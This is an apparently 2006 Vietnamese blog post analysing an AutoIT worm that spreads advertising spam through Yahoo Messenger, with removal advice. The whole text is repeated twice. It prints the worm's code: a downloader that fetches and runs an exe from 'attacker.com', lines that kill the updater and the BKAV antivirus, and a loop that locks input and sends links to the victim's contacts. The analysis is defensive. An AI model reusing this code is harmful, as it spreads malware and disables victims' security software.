My OperaCùng nghiên cứu các Virus lây lan qua Y!M nào...!
Sunday, September 17, 2006 6:41:09 AM
Thứ nhất : Những virus này lợi dụng các đặc tính của phần mềm chat trực tuyến YahooMessenger, tự động cài virus vào máy thông qua các link gửi từ list YM của máy nạn nhân để phát tán, nên có tốc độ lây nhiễm cực mạnh." thực ra virus này không tự cài vào máy, việc phát tán virus là dựa vào 2 yếu tố. 1 là đoạn java script được attacker chèn vào web, lợi dụng bug của IE mà javascript này downloader file xuống máy của victim. Thực ra là download xuống C:\Program Files\Yahoo!\Messenger với name là yupdate.exe đối với phiên bản 8.0, còn đối với phiên bản củ với name là update.exe. Attacker sử dụng hàm Inetget của autoIT để thực thi việc download file xuống máy
Code:
InetGet ( "http://attacker.com/Update.exe" ,@ProgramFilesDir & "\Yahoo!\Messenger\Update.exe" ,1,1) Sleep (3000) Run(@ProgramFilesDir & "\Yahoo!\Messenger\Update.exe") Endif hoặc InetGet ( "http://attacker.com/Update.exe" ,@ProgramFilesDir & "\Yahoo!\Messenger\yupdate.exe" ,1,1) Sleep (3000) Run(@ProgramFilesDir & "\Yahoo!\Messenger\Update.exe") Endif
để có thể download chồng vào file update, yupdate thì attacker đã sử dụng hàm
Code:
If Proces***ists("yupdate.exe") Then ProcessClose("yupdate.exe") EndIf
với mục đích không cho yupdate run trên Processes.
Khi máy bị dính file này thì chương trình tự động kich hoạt và set time cho việc spam.
Code:
$laplai = FileReadLine($file,2) For $laplai = 1 to 100 Step +1 ;$thoigian = FileOpen("link.txt", 0) Sleep($laplai) $yahooclient = FileExists (@ProgramFilesDir & "\Yahoo!\Messenger\YahooMessenger.exe") if $yahooclient = 1 then If Proces***ists("YahooMessenger.exe") Then Run(@ProgramFilesDir & "\Yahoo!\Messenger\YahooMessenger.exe") WinWaitActive("Yahoo! Messenger with Voice") ;$getlink = FileOpen("link.txt", 0) $link = FileReadLine($file,3) BlockInput (1) Send("!m") Send("u") Send("n") Send($link) Send("{ENTER}{ENTER}") $messenger = FileReadLine($file,4) Send("!A") Send("M") Sleep(400) send("{DOWN}") send("{SHIFTDOWN}") send("{DOWN 40}") send("{enter}") send("{LSHIFT}") send($messenger) Send("{ENTER}") send("{LSHIFT}") BlockInput (0) EndIf EndIf Next
trong file link.txt mà attacker đã Extract vào thư mục C:\Program Files\Yahoo!\Messenger hoặc vào c:\window\system32\driver\host\etc\ . Trong file link.txt chứa các đường link quảng cáo.
" Sử dụng ít nhất một phần mềm diệt virus, quét định kỳ, và thường xuyên cập nhật các thông tin mới. Thường xuyên download chương trình sửa lỗi của các nhà cung cấp phần mềm, đặc biệt từ các nhà cung cấp hệ điều hành như Microsoft."
- Thực ra đoạn script được viết bằng AutoIT này các chương trình diệt virus hầu như không nhận biết được. Việc sử dụng BKAV phiên bản mới nhất để diệt script lây qua Y!M này thì chắc chắn không được. Bởi vì, BKAV là một chương trình không có chức năng đặt mật khẩu cho soft, nên việc attacker sử dụng script End Task BKAV một cách quá dễ dàng: bằng
Code:
If Proces***ists("Bkav2006.exe") Then ProcessClose("Bkav2006.exe") EndIf
và tất nhiên các chương trình anti virus nào không có chức năng đặt mật khẩu để thay đổi setting cho soft thì script này end task dễ dàng. và sau đó tiếp tục auto thực thi lệnh.
- Việc thứ hai :BKAV có một yếu điểm trầm trọng là không thể quét nội dung trong file exe. Nên việc ngăn chặn script lây qua Y!M này là không thể.
- Script lây qua Y!M không phải là một chương trình phá hoại hệ thống, mà nó attacker chỉ viết để spam link quảng cáo.
Cắt đuôi Script lây qua Y!M::
- Update bản IE mới nhất tránh bug cho phép script downloader.
- Sử dụng chương trình diệt virus của hãng bảo mật Nga : Kaspersky Lab ( bản internet security lab version 6.0.33 ). trong mục setting bạn đặt cho mục web anti virus bạn chọn mức độ high. trong mục proactive defece bạn chọn chế độ regedit guard mục đích không cho phép các dword lạ chèn vào regedit.
- Khi bạn đã bị dính script lây qua Y!M này bạn có thể chọn trong các cách sau :
+ Uninstall Y!M và cài lại.
+ Rename path của yahoo trong disk C. Xóa file update.exe hoặc yupdate.exe nếu nó không có icon. Vì script này thực thi trình yahoo messenger ở path mặc định nên khi bạn thay đổi path thì đã vô hiệu hóa chức năng spam của nó.
- Còn việc bạn bị người khác spam thì tốt nhất nên Ignore nick đó đi. và nên tránh xa các link quản cáo nếu mấy bạn không cài Kaspersky Lab.
- Đặt mật khẩu cho trình diệt virus của bạn nếu không muốn bị end task bởi script này.
Code:
InetGet ( "http://attacker.com/Update.exe" ,@ProgramFilesDir & "\Yahoo!\Messenger\Update.exe" ,1,1) Sleep (3000) Run(@ProgramFilesDir & "\Yahoo!\Messenger\Update.exe") Endif hoặc InetGet ( "http://attacker.com/Update.exe" ,@ProgramFilesDir & "\Yahoo!\Messenger\yupdate.exe" ,1,1) Sleep (3000) Run(@ProgramFilesDir & "\Yahoo!\Messenger\Update.exe") Endif
để có thể download chồng vào file update, yupdate thì attacker đã sử dụng hàm
Code:
If Proces***ists("yupdate.exe") Then ProcessClose("yupdate.exe") EndIf
với mục đích không cho yupdate run trên Processes.
Khi máy bị dính file này thì chương trình tự động kich hoạt và set time cho việc spam.
Code:
$laplai = FileReadLine($file,2) For $laplai = 1 to 100 Step +1 ;$thoigian = FileOpen("link.txt", 0) Sleep($laplai) $yahooclient = FileExists (@ProgramFilesDir & "\Yahoo!\Messenger\YahooMessenger.exe") if $yahooclient = 1 then If Proces***ists("YahooMessenger.exe") Then Run(@ProgramFilesDir & "\Yahoo!\Messenger\YahooMessenger.exe") WinWaitActive("Yahoo! Messenger with Voice") ;$getlink = FileOpen("link.txt", 0) $link = FileReadLine($file,3) BlockInput (1) Send("!m") Send("u") Send("n") Send($link) Send("{ENTER}{ENTER}") $messenger = FileReadLine($file,4) Send("!A") Send("M") Sleep(400) send("{DOWN}") send("{SHIFTDOWN}") send("{DOWN 40}") send("{enter}") send("{LSHIFT}") send($messenger) Send("{ENTER}") send("{LSHIFT}") BlockInput (0) EndIf EndIf Next
trong file link.txt mà attacker đã Extract vào thư mục C:\Program Files\Yahoo!\Messenger hoặc vào c:\window\system32\driver\host\etc\ . Trong file link.txt chứa các đường link quảng cáo.
" Sử dụng ít nhất một phần mềm diệt virus, quét định kỳ, và thường xuyên cập nhật các thông tin mới. Thường xuyên download chương trình sửa lỗi của các nhà cung cấp phần mềm, đặc biệt từ các nhà cung cấp hệ điều hành như Microsoft."
- Thực ra đoạn script được viết bằng AutoIT này các chương trình diệt virus hầu như không nhận biết được. Việc sử dụng BKAV phiên bản mới nhất để diệt script lây qua Y!M này thì chắc chắn không được. Bởi vì, BKAV là một chương trình không có chức năng đặt mật khẩu cho soft, nên việc attacker sử dụng script End Task BKAV một cách quá dễ dàng: bằng
Code:
If Proces***ists("Bkav2006.exe") Then ProcessClose("Bkav2006.exe") EndIf
và tất nhiên các chương trình anti virus nào không có chức năng đặt mật khẩu để thay đổi setting cho soft thì script này end task dễ dàng. và sau đó tiếp tục auto thực thi lệnh.
- Việc thứ hai :BKAV có một yếu điểm trầm trọng là không thể quét nội dung trong file exe. Nên việc ngăn chặn script lây qua Y!M này là không thể.
- Script lây qua Y!M không phải là một chương trình phá hoại hệ thống, mà nó attacker chỉ viết để spam link quảng cáo.
Cắt đuôi Script lây qua Y!M::
- Update bản IE mới nhất tránh bug cho phép script downloader.
- Sử dụng chương trình diệt virus của hãng bảo mật Nga : Kaspersky Lab ( bản internet security lab version 6.0.33 ). trong mục setting bạn đặt cho mục web anti virus bạn chọn mức độ high. trong mục proactive defece bạn chọn chế độ regedit guard mục đích không cho phép các dword lạ chèn vào regedit.
- Khi bạn đã bị dính script lây qua Y!M này bạn có thể chọn trong các cách sau :
+ Uninstall Y!M và cài lại.
+ Rename path của yahoo trong disk C. Xóa file update.exe hoặc yupdate.exe nếu nó không có icon. Vì script này thực thi trình yahoo messenger ở path mặc định nên khi bạn thay đổi path thì đã vô hiệu hóa chức năng spam của nó.
- Còn việc bạn bị người khác spam thì tốt nhất nên Ignore nick đó đi. và nên tránh xa các link quản cáo nếu mấy bạn không cài Kaspersky Lab.
- Đặt mật khẩu cho trình diệt virus của bạn nếu không muốn bị end task bởi script này.
